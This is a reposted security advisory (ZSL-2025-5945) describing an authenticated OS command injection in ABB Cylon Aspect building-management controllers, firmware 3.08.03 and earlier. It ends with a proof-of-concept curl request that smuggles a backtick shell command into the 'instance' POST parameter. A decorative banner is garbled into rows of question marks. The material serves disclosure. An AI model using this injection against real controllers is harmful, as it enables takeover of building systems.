Latest Tech

Latest Posts

ABB Cylon Aspect 3.08.03 productRemovalUpdate.php Remote Code Execution

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 221
ABB Cylon Aspect 3.08.03 productRemovalUpdate.php Remote Code Execution
ABB Cylon Aspect 3.08.03 productRemovalUpdate.php Remote Code Execution
ABB Cylon Aspect 3.08.03 (productRemovalUpdate.php) Remote Code Execution


Vendor: ABB Ltd.
Product ABB Cylon Aspect 3.08.03 (productRemovalUpdate.php) Remote Code Execution


Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.03

Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller suffers from an authenticated blind OS command
injection vulnerability. This can be exploited to inject and execute arbitrary
shell commands through the 'instance' HTTP POST parameter called by the
productRemovalUpdate.php script. The token (key POST param) needs to be set
to 159 to trigger the command execution.

Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2025-5945
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5945.php


21.04.2024

--


$ cat project

P R O J E C T

.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
?????????????????????????? ???????????????????????????????
???????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????
???????????????????????????????????????????????????????????
????????????????????????? ????????????
???????????????????????????????????????
??????????????????????????????????????
???????????????????????????????????????
???????????????????????????????????????
???????????????????????????????????????
????????????????????????? ????????????


$ curl http://192.168.73.31/productRemovalUpdate.php \
> -H "Cookie: PHPSESSID=xxx" \
> -d "key=159&instance=`sleep 7`"

Information Security

Social Media Share
About Contact Terms of Use Privacy Policy
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸
All content is for educational purposes only. Unauthorized use of any information on this site is strictly prohibited.